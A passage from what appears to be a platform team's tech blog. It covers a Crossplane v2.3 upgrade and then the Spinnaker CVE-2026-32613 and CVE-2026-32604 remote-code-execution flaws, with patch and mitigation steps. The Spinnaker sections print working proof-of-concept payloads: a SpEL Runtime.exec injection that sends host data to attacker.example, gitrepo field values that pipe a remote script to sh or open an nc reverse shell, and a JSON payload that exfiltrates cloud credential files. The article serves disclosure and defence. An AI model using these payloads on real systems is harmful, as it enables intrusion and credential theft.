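    """Use the per-resource annotation when present, else the controller default."""
    value = metadata.get("annotations", {}).get(ANNOTATION)
    return parse_duration(value) if value else controller_default
```

With a one-minute controller default, the IAM Role above would resolve to 24 hours and an unannotated resource would keep the default.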

4.2 Immediate Trigger — Post-External-Change Sync

The second annotation, reconcile-requested-at, re-enqueues the resource immediately whenever its value changes. Two operational examples:

# Scenario 1: rotate the RDS master password out-of-band, force immediate sync
aws rds modify-db-instance --db-instance-identifier marketing-pg \
  --master-user-password "$(openssl rand -base64 32)" --apply-immediately
kubectl annotate -n marketing instance.rds.aws.m.upbound.io marketing-pg \
  crossplane.io/reconcile-requested-at="$(date -u +%FT%TZ)" --overwrite

# Scenario 2: debugging. A new Composition Function just merged, so force re-evaluation of every XR
# (-o name omits the namespace, so read namespace and name as separate columns)
kubectl get app -A --no-headers \
  -o custom-columns=NS:.metadata.namespace,NAME:.metadata.name \
| while read -r ns name; do
  kubectl annotate -n "$ns" app "$name" \
    crossplane.io/reconcile-requested-at="$(date -u +%FT%TZ)" --overwrite
done
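
The "whenever the value changes" semantics are worth spelling out, because re-applying the same timestamp does nothing. A small Python sketch of that behavior follows. It is a conceptual model only: the class and method names are hypothetical, and the real controller's bookkeeping may differ.

```python
ANNOTATION = "crossplane.io/reconcile-requested-at"


class ReconcileTrigger:
    """Remember the last annotation value seen for each resource."""

    def __init__(self) -> None:
        self._seen: dict[str, str] = {}

    def should_enqueue(self, key: str, annotations: dict) -> bool:
        """Return True only when the annotation carries a value not seen before."""
        value = annotations.get(ANNOTATION)
        if value is None or self._seen.get(key) == value:
            return False
        self._seen[key] = value
        return True
```

This is why the shell examples above always write a fresh timestamp: a new value is what requests the reconcile, not the presence of the annotation.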

5. XR Circuit Breaker Reset — Same-Named Replacements Start Clean

Through v2.2, if an XR tripped its circuit breaker (Crossplane's protection against reconcile thrashing) and you deleted the XR, the breaker state was inherited by any same-named replacement. The natural recovery instinct — "delete it, recreate it, it'll work" — didn't actually work, and operators ended up restarting controller pods to flush state.

v2.3 discards the circuit-breaker state the moment the XR is deleted. A same-named replacement starts from the same clean state as a brand-new resource.

Scenario	v2.2 (before)	v2.3 (after)
XR reconcile is throttled by thrashing	Circuit open	Circuit open
Operator deletes the XR	Circuit state cached/retained	Circuit state discarded immediately
Same-named XR recreated	Inherits open circuit → no reconcile after recreate	Starts clean → reconciles immediately
Recovery procedure	Restart controller pod or use a different name	Same name + recreate is sufficient
Operational cognitive cost	Tribal-knowledge accretion	Reduced to a 1-step standard procedure
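
The difference between the two columns comes down to whether breaker state outlives the object it belongs to. The Python sketch below models that with a dictionary keyed by namespace and name. The class, the failure threshold, and the method names are hypothetical and are not taken from the Crossplane source.

```python
class CircuitBreakers:
    """Per-XR breaker state keyed by "namespace/name" (hypothetical structure)."""

    def __init__(self, threshold: int = 3) -> None:
        self.threshold = threshold
        self._failures: dict[str, int] = {}

    def record_thrash(self, key: str) -> None:
        """Count one thrashing reconcile against the XR."""
        self._failures[key] = self._failures.get(key, 0) + 1

    def is_open(self, key: str) -> bool:
        """The breaker is open once the threshold is reached."""
        return self._failures.get(key, 0) >= self.threshold

    def on_delete(self, key: str) -> None:
        """v2.3 behavior as described above: drop the state with the XR."""
        self._failures.pop(key, None)
```

Without the `on_delete` call, a recreated XR with the same key would find the old counter and stay throttled, which is the v2.2 behavior in the table.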

6. No-op Status Update Skip on CompositionRevision/Composite Reconcilers

The fifth change is ETCD write-load optimization. Through v2.2, the CompositionRevision controller and the composite reconciler issued a status update PUT every reconcile loop, even when nothing in the status had actually changed. At cluster scale this "no-change status PUT" was a measurable fraction of ETCD traffic.

v2.3 compares the previous and new status and skips the PUT when they're identical. Enable with the alpha gate --enable-no-op-status-update-skip. On our staging cluster (~4,200 MRs) we measured ETCD PUT call volume down ~31%, apiserver CPU down ~18% in steady state. The effect scales with cluster size.

# Prometheus queries — before/after the alpha gate
# (1) ETCD write volume as recorded by the apiserver (status writes are labeled operation="update")
sum(rate(etcd_request_duration_seconds_count{operation="update"}[5m]))

# (2) apiserver CPU
sum(rate(container_cpu_usage_seconds_total{namespace="kube-system",pod=~"kube-apiserver-.*"}[5m]))

# (3) Crossplane controller's own reconcile rate (side-effect watch)
# composite controllers are registered per XRD, so match on the name prefix
sum(rate(controller_runtime_reconcile_total{controller=~"composite/.*"}[5m])) by (result)
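
The skip described at the start of this section is an equality check placed in front of the write. A minimal Python sketch, assuming the status is a plain dictionary and `put` is whatever callable performs the write (both are stand-ins, not Crossplane types):

```python
from typing import Callable


def update_status(stored: dict, desired_status: dict, put: Callable[[dict], None]) -> bool:
    """Write the status only when it differs; return True if a write happened."""
    if stored.get("status") == desired_status:
        return False  # no-op: nothing changed, so skip the write entirely
    stored["status"] = desired_status
    put(stored)
    return True
```

Every reconcile that returns `False` here is one write the API server and ETCD never see, which is where the reduction measured by query (1) comes from.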

7. Crossplane CLI Repository Split and Independent Release Cycle

The sixth change touches even non-coder operators. The CLI (formerly called crank) leaves the core repo with v2.3.0. Its new home is github.com/crossplane/crossplane-cli, and from here on out the version numbers and release cadences are independent.

Axis	Pre-v2.3	Post-v2.3
Repository	`crossplane/crossplane` (single)	`crossplane/crossplane` (core) + `crossplane/crossplane-cli` (CLI)
Version sync	Always identical	Independent — CLI can move faster
Release cadence	Quarterly (3 months)	Core quarterly, CLI as needed
Install command	`curl ... /bin/linux_amd64/crank`	`curl ... /bin/linux_amd64/crossplane` (unified name)
Version compatibility	1:1	CLI guarantees backwards compat to core N-2
New command	`crossplane beta trace` (table-only)	`crossplane beta trace -o yaml` (YAML output added)

7.1 YAML Trace Output — GitOps Friendliness

# v2.3 new: take trace output as YAML and pipe to other tools
crossplane beta trace -o yaml app/my-app -n marketing > trace.yaml

# Combine with kubectl-tree to visualize control-plane topology
yq '.children[].name' trace.yaml | while read child; do
  kubectl tree $child -n marketing
done

# Drift detection — store trace output in Git, surface diffs as PRs
cp trace.yaml history/trace-$(date +%Y%m%d).yaml
git add history/trace-*.yaml && git commit -m "chore: nightly trace snapshot"

8. Upgrade Workflow — v2.2 → v2.3 (Non-Disruptive Standard)

v2.3 is a minor upgrade inside the v2.x series, so API compatibility is preserved. Alpha gates must still be staged. Our standard four-step procedure:

# Step 1: precondition check: Provider/Function packages are fully qualified URLs
# v2 rejects short names, so this needs verification just before v2.2 → v2.3
# A fully qualified reference has a registry host (containing a dot) before the first slash
kubectl get pkg -A -o jsonpath='{range .items[*]}{.kind}{"\t"}{.metadata.name}{"\t"}{.spec.package}{"\n"}{end}' \
  | awk -F'\t' '$3 !~ "^[^/]+\\.[^/]+/" {print "❌ NOT FQ:", $0}'
# (must be empty to pass)

# Step 2: dev cluster upgrade — alpha gates OFF
helm upgrade crossplane crossplane-stable/crossplane \
  --version 2.3.0 \
  --namespace crossplane-system \
  --reuse-values \
  --wait
kubectl -n crossplane-system get deploy crossplane -o jsonpath='{.spec.template.spec.containers[0].image}'
# crossplane/crossplane:v2.3.0

# Step 3: regression — render-diff every Composition against golden output
for f in compositions/*.yaml; do
  comp=$(yq '.metadata.name' $f)
  crossplane render xrs/test-${comp}.yaml $f functions/index.yaml > /tmp/render-$comp.yaml
  diff /tmp/render-$comp.yaml golden/render-$comp.golden.yaml \
    || { echo "❌ regression in $comp"; exit 1; }
done

# Step 4: staged staging → prod rollout. Alpha gates: ON in staging first, then prod
helm upgrade crossplane crossplane-stable/crossplane \
  --version 2.3.0 \
  --namespace crossplane-system \
  --set 'args={--debug,--enable-environment-configs,--enable-operations,--enable-provider-deletion-protection,--enable-no-op-status-update-skip}' \
  --wait
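
The Step 1 precondition can also be expressed as a reusable check, for example in a pre-upgrade script. The Python sketch below uses a common heuristic for spotting a registry host (a dot, a port, or `localhost` before the first slash). It is an assumption about what "fully qualified" means in practice, not Crossplane's own validation logic, and the package names in the usage note are only examples.

```python
def is_fully_qualified(package: str) -> bool:
    """True when the reference starts with a registry host, e.g. xpkg.crossplane.io/..."""
    host, sep, rest = package.partition("/")
    if not sep or not rest:
        return False  # no slash at all: a bare short name
    # Heuristic: a registry host has a dot, a port, or is localhost.
    return "." in host or ":" in host or host == "localhost"
```

For instance, `xpkg.crossplane.io/crossplane-contrib/provider-nop:v0.4.0` passes, while `crossplane-contrib/provider-nop:v0.4.0` is flagged because its first path segment is an organization rather than a registry host.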

9. ManoIT In-House Adoption Checklist — Three Control Planes × Sixteen Steps

ManoIT runs three control planes (prod/stage/dev), so we stage the alpha gates: one week in staging, one more week in prod, then enable. The full checklist:

#	Item	Owner	Done when
1	Inventory Crossplane/Provider/Function versions on all three control planes	Platform	Merged spreadsheet
2	Audit fully qualified package URLs — flag any remaining short names	Platform	`kubectl get pkg` shows 0 NOT-FQ
3	Upgrade dev to v2.3.0 (alpha gates OFF)	Platform	`crossplane version --server` = v2.3.0
4	Composition regression — render vs. golden	Service owners	All diffs = 0
5	Staging: v2.3.0 + `--enable-no-op-status-update-skip`	Platform	1-week soak, ETCD PUT delta report
6	Staging: add `--enable-provider-deletion-protection`	Platform	ClusterUsage auto-created, refused-delete smoke test passes
7	Apply `crossplane.io/poll-interval` to low-volatility MRs (IAM/VPC)	Service owners	≥30% drop in cloud API calls post-apply
8	Standardize force-refresh procedure on `reconcile-requested-at` — runbook update	SRE	Runbook merged, ≥1 incident application
9	Upgrade prod to v2.3.0 (alpha gates OFF)	Platform	`crossplane version --server` = v2.3.0
10	Prod: `--enable-no-op-status-update-skip`	Platform	1-week soak, ETCD PUT + apiserver CPU report
11	Prod: `--enable-provider-deletion-protection`	Platform	ClusterUsage created; tear-down doc updated to "delete ClusterUsage → delete Provider"
12	CI gate added — High-Fidelity Render diff on PRs	Platform	Workflow merged, ≥1 regression PR blocked in practice
13	Internal asdf/Mise picks Crossplane CLI from new repo	Platform	`asdf install crossplane 2.3.0` works
14	`crossplane beta trace -o yaml` snapshotted daily to Git	Observability	Nightly Cron + PR automation
15	Prometheus alerts: XR circuit breaker open, MR poll-interval=24h+ ratio	Observability	Alert PR merged, fire/resolve test passed
16	RFC: alpha gate enablement policy (dev immediate, staging 1w, prod +1w)	Platform	RFC merged, in quarterly security/release review

10. Conclusion — The Inflection Point of "Operationally Trustworthy Control Plane"

The six v2.3 changes share one sentence: "the v2 series, for the first time, demonstrates its reliability claim with operational metrics." The High-Fidelity Render Engine structurally resolves the six-year "local diverges from cluster" pain. Provider Deletion Protection blocks the top-incident scenario with one alpha gate. The two reconcile annotations finally hand operators the per-resource cadence control they've been asking for. The XR circuit-breaker reset simplifies post-incident recovery. The no-op status update skip removes ETCD write pressure. The CLI repo split opens a faster lane for CLI-side evolution.

Three things to keep in mind going into adoption:

Stage the alpha gates. dev OFF for regression, staging ON for 1 week, prod for another 1 week before flipping.
Re-audit fully qualified package URLs immediately before upgrading. v2 rejects short names. Leftover short-name packages will fail controller boot even on a v2.2 → v2.3 minor upgrade.
The High-Fidelity Render payoff shows up in CI, not at the CLI. A single crossplane render call won't feel different. Wire render-diff into PR gates and you'll catch composition regressions before merge.

Shortest single-line recommendation: "Upgrade dev to v2.3 today, enable both alpha gates in staging this week."

Cross-posted from ManoIT Tech Blog. Authored by the ManoIT Platform Team with AI-assisted drafting (Claude Opus 4.6) on May 27, 2026. All operational figures cited are from internal staging measurements and are reproducible on any cluster of comparable size.

Originally published at ManoIT Tech Blog.

Spinnaker 2026.1.0 Emergency Patch — CVE-2026-32613 Echo SpEL RCE + CVE-2026-32604 Clouddriver Gitrepo Shell Injection

daniel jeong — Tue, 26 May 2026 00:14:56 +0000

Spinnaker 2026.1.0 Emergency Patch Deep Dive — CVE-2026-32613 Echo SpEL RCE + CVE-2026-32604 Clouddriver Gitrepo Shell Injection (Double CVSS 9.9 Critical) Redefining the 2026 GitOps Multi-Cloud Delivery Pipeline Security Standard

On April 20, 2026, the Spinnaker security team simultaneously disclosed two CVSS 9.9 Critical remote code execution vulnerabilities. The first is CVE-2026-32613 — the Echo service's expected artifacts evaluation logic fails to restrict the Spring Expression Language (SpEL) context to a trusted class allowlist, allowing an authenticated user to instantiate arbitrary Java classes and execute host commands. The second is CVE-2026-32604 — Clouddriver's GitJobArtifactDownloader interpolates the reference, version, and artifactAccount fields of a gitrepo artifact directly into a sh -c invocation without validation, so shell metacharacters such as backticks, $(...), ;, and && are passed straight to the shell, escalating to RCE.

Both vulnerabilities are post-authentication, but many Spinnaker deployments sit behind a single SSO entry point with permissive RBAC, so the real attack surface is much larger than "auth required" suggests. Patches landed simultaneously across 2026.1.0, 2026.0.1, 2025.4.2, and 2025.3.2, and ZeroPath published a PoC for both CVEs the next day, so the patch window and the exposure window were effectively the same. This article decomposes the root cause of each CVE at the SpEL context handling and ProcessBuilder invocation level, reconstructs the public PoC at the PR / CLI / Helm values level, and consolidates ManoIT's phased patch, temporary block, and observability strategy applied to four internal multi-cloud delivery pipelines across nine axes.
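
The shell-injection class behind CVE-2026-32604 has a well-known general remedy: validate user-controlled fields against a conservative allowlist and pass them as separate arguments instead of interpolating them into a `sh -c` string. The Python sketch below illustrates that pattern only. It is not the Clouddriver patch (Clouddriver is written in Java), and the function name, the regular expression, and the chosen `git` arguments are assumptions.

```python
import re

# Conservative allowlist: letters, digits, and the punctuation URLs and refs need.
_SAFE_FIELD = re.compile(r"[A-Za-z0-9._/:@-]+")


def build_git_clone_argv(reference: str, version: str) -> list[str]:
    """Validate both fields, then build an argv list that never touches a shell."""
    for name, value in (("reference", reference), ("version", version)):
        # A leading "-" is rejected so a value cannot be parsed as an option.
        if not _SAFE_FIELD.fullmatch(value) or value.startswith("-"):
            raise ValueError(f"rejected {name}: {value!r}")
    return ["git", "clone", "--branch", version, "--", reference]
```

Because the result is an argument list, metacharacters such as backticks, `$(...)`, `;`, and `&&` have no special meaning even if one slipped past validation. The allowlist is a second layer, not the only one.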

1. Why April 20, 2026 Is the Inflection Point for Spinnaker Security

Spinnaker is a multi-cloud continuous delivery platform open-sourced by Netflix in 2015 and donated to the Continuous Delivery Foundation (CDF) in 2019. Its strength is a distributed architecture split into ten microservices (Deck UI, Gate API gateway, Orca orchestrator, Clouddriver cloud abstraction, Echo event router, Igor CI integration, Fiat authorization, Front50 metadata, Kayenta canary, Rosco bakery), but that same split creates ambiguous trust boundaries between services. The two CVEs disclosed on April 20 are exactly the result of that ambiguity.

Date	Event	Operational Meaning
2015.11	Netflix open-sources Spinnaker	Start of multi-cloud CD standard
2019.03	Joins the Continuous Delivery Foundation (CDF) as a founding project	Community governance settles
2024.11	Spinnaker 2025.0.0 released	Halyard dependency partially removed, Kubernetes 1.30 support
2025.07	Spinnaker 2025.3.0	Echo SpEL evaluation path expanded (artifact trigger regex)
2025.11	Spinnaker 2025.4.0	Clouddriver gitrepo artifact HTTPS basic auth added
2026.02	Spinnaker 2026.0.0	Operator recommended over Halyard, Kubernetes 1.32 support
2026.04.07	Spinnaker 2026.0.2 (no security patch)	Minor bugfix release
2026.04.20	CVE-2026-32613 + CVE-2026-32604 simultaneous disclosure	Two CVSS 9.9 Critical, same-day patches
2026.04.20	Patches 2026.1.0 / 2026.0.1 / 2025.4.2 / 2025.3.2 released	Four supported lines patched simultaneously, workarounds documented
2026.04.21	ZeroPath PoC published (GitHub)	Patch and exposure windows effectively identical
2026.05.02	CCB Belgium national cybersecurity advisory	"Patch Immediately" — government/finance distribution
2026.05.15	Armory, OpsMx etc. commercial distros backport patches	Enterprise customer notification emails

Two lines matter most operationally: (1) the patch and the PoC dropped in the same week — teams assuming a one-month patch grace period had 24 hours to decide; (2) four support lines were patched simultaneously — Spinnaker informally supports 2025.3.x, 2025.4.x, 2026.0.x, and 2026.1.x as LTS lines, and the vulnerable code lived in all four, so version downgrade is not a viable mitigation.

2. CVE-2026-32613 — Echo Service SpEL Context-Unrestricted RCE

The first CVE lives in Echo's echo-pipelinetriggers module. Echo is Spinnaker's event router — it receives external events (CI build completion, Pub/Sub, scheduled times, artifact changes) and fires the registered pipelines. During this flow it evaluates expected artifacts (the artifacts a pipeline waits for) using Spring Expression Language.

2.1 Root Cause — Inconsistent SpEL Context Handling Between Orca and Echo

Spinnaker's Orca (the pipeline orchestrator) restricts the SpEL evaluation context to a trusted class allowlist. This is the standard pattern adopted after a series of SpEL injection issues reported in 2019. However, Echo's expected artifacts evaluation path missed applying this allowlist, leaving SpEL with full JVM class access.

Axis	Orca (safe)	Echo (vulnerable, pre-patch)
SpEL evaluation context	`StandardEvaluationContext` + trusted class allowlist	`StandardEvaluationContext` (unrestricted)
Accessible classes	Spinnaker context vars + allowlisted classes	Entire JVM (incl. java.lang.Runtime)
`T(...)` operator	Allowlist only	Arbitrary classes allowed
Reflection calls	Blocked	Available
Arbitrary method invocation	Allowlisted methods only	All public methods
Post-2019 SpEL CVE response	Applied	Missed (5 years undetected)

The most painful line is the last one. The allowlist that Orca adopted after the 2019 reports was never applied to Echo's expected-artifacts evaluation path, and the gap went unnoticed for about five years. The patch fills exactly that gap: Echo's SpEL context now uses the same trusted class allowlist as Orca. The change itself is around 30 lines, yet for as long as those lines were missing, every Spinnaker instance was exposed.

2.2 Attack Scenario — Poisoning an Expected Artifact Field with a SpEL Payload

Assume the attacker compromised an account with roles=APPLICATION_OWNER (the most common Spinnaker user role). The attack flow:

# 1) Log in to Spinnaker Gate API, capture session cookie
GATE="https://gate.spinnaker.example.com"
curl -sS -c cookies.txt "${GATE}/login/google" -d "username=victim&password=..."

# 2) Create a new pipeline (or edit an existing one)
# Inject SpEL payload into the expected artifact's name field
cat > pipeline.json <<'JSON'
{
  "application": "marketing",
  "name": "exfil-demo",
  "expectedArtifacts": [{
    "id": "art-0",
    "matchArtifact": {
      "type": "docker/image",
      "name": "${T(java.lang.Runtime).getRuntime().exec(new String[]{'sh','-c','curl https://attacker.example/$(hostname)/$(id)'}).getInputStream()}",
      "reference": "x"
    },
    "useDefaultArtifact": true,
    "defaultArtifact": {"type": "docker/image", "name": "x", "reference": "x"}
  }],
  "triggers": [{"type": "pubsub", "enabled": true, "pubsubSystem": "google", "subscriptionName": "spinnaker"}],
  "stages": []
}
JSON

# 3) Save pipeline -> next Pub/Sub event triggers Echo to evaluate the SpEL -> RCE
curl -sS -b cookies.txt -H "Content-Type: application/json" \
  -X POST "${GATE}/pipelines" --data-binary @pipeline.json

The key is that ${T(java.lang.Runtime).getRuntime().exec(...)} executes as-is during Echo's SpEL evaluation. T(...) is the SpEL type-reference operator; with an allowlist in place, java.lang.Runtime is rejected. Pre-patch Echo had no such rejection logic, so the payload runs sh -c inside the Echo container and exfiltrates output to an external endpoint.

2.3 SpEL Evaluation Code Before and After the Patch

Aspect	Before patch	After patch (2026.1.0 / 2025.3.2 backport)
Evaluation context creation	`new StandardEvaluationContext()`	`SpinnakerSpelEvaluationContext.trusted()`
Type locator	Default `StandardTypeLocator`	Allowlist-based `TrustedTypeLocator`
Allowlisted classes (examples)	—	`String`, `Math`, `Integer`, `Long`, `Double`, `Boolean`, `List`, `Map`, partial Spinnaker domain models
Blocked classes (examples)	—	`java.lang.Runtime`, `java.lang.ProcessBuilder`, `java.lang.reflect.*`, `java.io.File`, etc.
Non-allowlisted class call	Executes	`SpelEvaluationException: type 'X' is not whitelisted`
Logging	—	Blocked evaluations logged at WARN level (detectable)

Operationally interesting: the patch logs blocked SpEL evaluations at WARN level, so rejected expressions are detectable. The allowlist can also break legitimate pipelines right after patching, which §6 covers.
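
The allowlist behavior in the table can be approximated outside the JVM. The sketch below is a minimal Python model, not the Spinnaker patch: it pulls `T(...)` type references out of an expression string and reports the ones missing from a trusted set. `TRUSTED_TYPES` and `untrusted_types` are hypothetical names, and the set only mirrors the example classes listed above (assumed here to live in `java.lang` and `java.util`).

```python
import re

# Hypothetical allowlist, loosely mirroring the example classes in the table.
TRUSTED_TYPES = {
    "java.lang.String", "java.lang.Math", "java.lang.Integer",
    "java.lang.Long", "java.lang.Double", "java.lang.Boolean",
    "java.util.List", "java.util.Map",
}

# Matches SpEL type references such as T(java.lang.Runtime).
TYPE_REF = re.compile(r"\bT\(\s*([A-Za-z_][\w.$]*)\s*\)")


def untrusted_types(expression: str) -> list[str]:
    """Return the T(...) type names in an expression that are not allowlisted."""
    rejected = []
    for name in TYPE_REF.findall(expression):
        # SpEL resolves unqualified names such as T(Math) against java.lang.
        qualified = name if "." in name else f"java.lang.{name}"
        if qualified not in TRUSTED_TYPES:
            rejected.append(qualified)
    return rejected
```

Running a check like this over stored pipeline JSON before patching gives an early list of expressions the allowlist is likely to reject.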

3. CVE-2026-32604 — Clouddriver Gitrepo Artifact Shell Metacharacter Injection RCE

The second CVE lives in Clouddriver's clouddriver-artifacts-gitrepo module — specifically the GitJobArtifactDownloader class. This class is invoked when a gitrepo-typed artifact is referenced in a pipeline; it clones the specified Git repository to local disk and downloads files at a specific branch / tag / path for downstream stages.

3.1 Root Cause — Shell Command String Interpolation Passed to ProcessBuilder

The downloader needs to execute something like git clone --depth 1 --branch <branch> <url> <tmpdir>. Pre-patch, the code assembled this as List<String> args = ["sh", "-c", "git clone ... " + branch + " ..."] and called new ProcessBuilder(args).start(). In other words, the user-supplied branch string entered shell word-splitting inside sh -c. Shell metacharacters are interpreted by the shell, and backticks / $(...) are executed as command substitution.

#	Artifact field	Example legitimate value	Example malicious value	Result
1	`reference` (URL)	`https://github.com/org/repo.git`	`https://github.com/org/repo.git; curl evil.sh | sh; #`	RCE (downloaded script piped to `sh`)
2	`version` (branch)	`main`	``main$(curl https://attacker/`whoami`)``	RCE + hostname/user exfiltration
3	`location` (path)	`k8s/deploy.yaml`	`k8s/deploy.yaml; nc evil 4444 -e /bin/sh`	Reverse shell
4	`artifactAccount`	`github-prod`	``github-prod`id` ``	RCE + privilege info leak

The most-cited PoC one-liner:

{
  "type": "git/repo",
  "reference": "https://github.com/example/x.git",
  "version": "main$(curl https://attacker.example/exfil?h=$(hostname)&u=$(id -un)&k=$(cat /etc/spinnaker/secrets/aws-key))",
  "location": "k8s/",
  "artifactAccount": "github-prod"
}

When Clouddriver processes this gitrepo artifact, it evaluates to sh -c "git clone --branch main$(curl ...) ...". The $(curl ...) executes first, exfiltrating /etc/spinnaker/secrets/aws-key to the attacker. Clouddriver is the most sensitive service because it holds cloud API credentials, so AWS IAM keys, GCP service account keys, and Azure client secrets are all exposed.

3.2 ProcessBuilder Invocation Before and After the Patch

Aspect	Before patch	After patch (2026.1.0)
Command assembly	`["sh", "-c", "git clone --branch " + branch + " " + url + " " + dir]`	`["git", "clone", "--branch", branch, url, dir]`
Shell invocation	Via `sh -c` — shell metachar interpretation	Direct `git` call — no shell, metachar inert
Input validation	—	`BranchNameValidator` + `RefNameValidator` added
Allowed character pattern	—	`^[A-Za-z0-9._\-/]{1,250}$` (git ref standard)
URL scheme validation	—	Only `http(s)://`, `ssh://`, `git@` allowed — `file://`, `ext::` blocked
On validation failure	—	`InvalidGitArtifactException` + audit log

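The core fix is not going through a shell. When ProcessBuilder receives the argv array directly, no shell parses the command line, so no word-splitting or command substitution occurs: ;, $(...), and backticks reach git as literal characters inside a single argument, and git rejects them as an unknown ref name. The second line of defense is the git ref regex validation, added as defense-in-depth.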
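
To make the before/after contrast concrete, here is a minimal Python sketch of the same idea, assuming the ref pattern and URL schemes from the table above. It is not the Clouddriver code: `build_clone_argv` and `clone` are hypothetical helpers that validate the inputs and then hand git an argv list instead of a shell string.

```python
import re
import subprocess

# Pattern and allowed schemes come from the table above; the helper names
# and the ValueError are assumptions of this sketch.
REF_PATTERN = re.compile(r"^[A-Za-z0-9._\-/]{1,250}$")
ALLOWED_URL_PREFIXES = ("https://", "http://", "ssh://", "git@")


def build_clone_argv(branch: str, url: str, dest: str) -> list[str]:
    """Validate the inputs and return an argv list for a shell-free git clone."""
    if not REF_PATTERN.fullmatch(branch):
        raise ValueError(f"invalid git ref: {branch!r}")
    if not url.startswith(ALLOWED_URL_PREFIXES):
        raise ValueError(f"URL scheme not allowed: {url!r}")
    # Each element reaches git as exactly one argument; no shell parses it.
    return ["git", "clone", "--depth", "1", "--branch", branch, url, dest]


def clone(branch: str, url: str, dest: str) -> None:
    """Run the clone without a shell (subprocess defaults to shell=False)."""
    subprocess.run(build_clone_argv(branch, url, dest), check=True)
```

Validation runs before the process is started, so a rejected value never reaches git at all; the argv form then covers anything the pattern might miss.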

4. Temporary Mitigations — Driving Exposure Surface to Zero Before Patching

Two workarounds are usable during the short window before the patches roll out: (1) service-level disable, (2) artifact-type-level disable. ManoIT enabled both while patches were being staged.

4.1 Echo SpEL Evaluation Block (Temporary CVE-2026-32613 Mitigation)

The strongest workaround is disabling Echo entirely, but that stops all pipeline triggers (Pub/Sub, Cron, CI completion). The operational cost is too high, so ManoIT chose to disable only expected-artifact evaluation.

# spinnaker-config/echo-local.yml
# CVE-2026-32613 workaround — disable Echo expected artifacts SpEL evaluation
echo:
  pipelinetriggers:
    artifacts:
      # Force false from April 20 until patches are applied
      enabled: false
      # SpEL evaluation never runs, so the unrestricted context issue is avoided
  events:
    # Keep triggers themselves — Cron, Pub/Sub continue to work
    enabled: true

# Side effect — pipelines with these patterns won't fire during the block window:
#   - Auto-deploy on Docker image push
#   - Auto-sync on Helm chart release
#   - GitOps sync on Git push
# Route these triggers temporarily via Jenkins/GitLab CI calling the Spinnaker API

4.2 Clouddriver Gitrepo Artifact Type Disable (Temporary CVE-2026-32604 Mitigation)

# spinnaker-config/clouddriver-local.yml
# CVE-2026-32604 workaround — completely block gitrepo artifact type
artifacts:
  gitrepo:
    enabled: false   # false from April 20 until patches are applied
  # Other artifact types unaffected
  github:
    enabled: true
  helm:
    enabled: true
  http:
    enabled: true
  s3:
    enabled: true
  gcs:
    enabled: true

# Side effect — manifest sync pipelines using git/repo must move to github or http types:
#   git/repo + branch=main + path=k8s/  ->  github + commitish=main + path=k8s/

4.3 Workaround Verification Steps

Check	Command	Expected
Echo expected artifacts disabled	`curl -s http://echo:8089/env | jq '.echo.pipelinetriggers.artifacts.enabled'`	`false`
Clouddriver gitrepo disabled	`curl -s http://clouddriver:7002/artifacts/credentials | jq '.[].types'`	No `git/repo` entry in the output
SpEL evaluation rejection log	`kubectl logs -n spinnaker deploy/spin-echo | grep "ArtifactEvaluator disabled"`	Matching log lines present
Gitrepo artifact creation blocked	Try creating a git/repo artifact in Deck UI	git/repo removed from dropdown
Affected pipeline inventory	`spin pipeline list --output json | jq '.[] | …`	

5. Patch Application — Three Distributions: Halyard / Operator / Helm

Spinnaker patch procedures vary by installation method. The 2026.x recommended order is Operator → Helm → Halyard. ManoIT operates four internal instances — two via Operator, one via Helm, one via Halyard — so all three paths were exercised.

5.1 Operator-Based Upgrade (Recommended, 2026.x Standard)

# spinnaker-config.yaml
apiVersion: spinnaker.io/v1alpha2
kind: SpinnakerService
metadata:
  name: spinnaker
  namespace: spinnaker
spec:
  spinnakerConfig:
    config:
      version: 2026.1.0   # April 20 patch — 2026.0.0 -> 2026.0.1, 2025.4.x -> 2025.4.2
      persistentStorage:
        persistentStoreType: s3
      security:
        # After patching, restore the §4.1 / §4.2 workarounds to enabled: true
        artifacts:
          gitrepo:
            enabled: true   # restore after patch
    profiles:
      echo:
        pipelinetriggers:
          artifacts:
            enabled: true   # restore after patch

# Apply + monitor rolling update
kubectl apply -f spinnaker-config.yaml -n spinnaker
kubectl rollout status -n spinnaker deploy/spin-echo --timeout=10m
kubectl rollout status -n spinnaker deploy/spin-clouddriver --timeout=15m

# Version check
for svc in echo clouddriver orca gate front50; do
  pod=$(kubectl get pod -n spinnaker -l "app=spin,cluster=spin-${svc}" -o name | head -1)
  echo "${svc}: $(kubectl exec -n spinnaker "${pod}" -- grep -A1 'version:' /opt/spinnaker/config/spinnaker.yml)"
done

5.2 Helm Chart-Based Upgrade

# OpsMx Spinnaker Helm chart (4.7.x supports 2026.1.0)
helm repo update opsmx
helm upgrade --install spinnaker opsmx/spinnaker \
  --namespace spinnaker \
  --version 4.7.2 \
  --set spinnakerVersion=2026.1.0 \
  --set profiles.echo.pipelinetriggers.artifacts.enabled=true \
  --set profiles.clouddriver.artifacts.gitrepo.enabled=true \
  --wait --timeout 20m

helm get values spinnaker -n spinnaker | grep -E 'spinnakerVersion|artifacts'

5.3 Halyard-Based Upgrade (Legacy)

# Run inside the Halyard container — deprecated in 2026.x but many sites still use it
hal config version edit --version 2026.1.0
hal config features edit --artifacts true
hal deploy apply
# Afterwards, run hal deploy collect-logs and confirm there are no SpEL WARN entries

6. Post-Patch Regression Verification — Don't Block Legitimate SpEL

The most common post-patch operational incident is legitimate SpEL expressions being rejected by the allowlist. At ManoIT, three pipelines stopped right after patching, all matching one of the first two patterns below; patterns 3 to 5 continued to work:

#	Expression (worked pre-patch)	Post-patch result	Fix
1	`${T(java.time.LocalDate).now()}`	Blocked — `java.time.LocalDate` not allowlisted	Use Spinnaker-provided `${execution.startTime}` etc.
2	`${T(org.apache.commons.lang3.StringUtils).join(...)}`	Blocked — Apache Commons not allowlisted	Use native Java String methods or Spinnaker helpers
3	Argument-less variable reference `${parameters.version}`	Works	—
4	List/map indexing `${trigger.artifacts[0].name}`	Works	—
5	Math/string `${parameters.replicas * 2}`	Works	—

Three-step verification procedure:

# 1) For 1 week after the patch, harvest SpEL blocks from Echo logs
kubectl logs -n spinnaker deploy/spin-echo --since=168h \
  | grep -E "SpelEvaluationException.*not whitelisted" \
  | awk '{print $NF}' | sort | uniq -c | sort -rn

# 2) Map blocked pipelines — search the same SpEL in pipeline JSON
for app in $(spin application list --output json | jq -r '.[].name'); do
  spin pipeline list --application "$app" --output json \
    | jq -r --arg blocked "java.time.LocalDate" \
        '.[] | select(.expectedArtifacts // [] | tostring | contains($blocked)) | "\(.application)/\(.name)"'
done

# 3) Pattern-bulk migration PR — code-searching teams can fix in bulk
rg -uu --json -e 'T\(java\.time\.LocalDate\)\.now\(\)' pipelines/ \
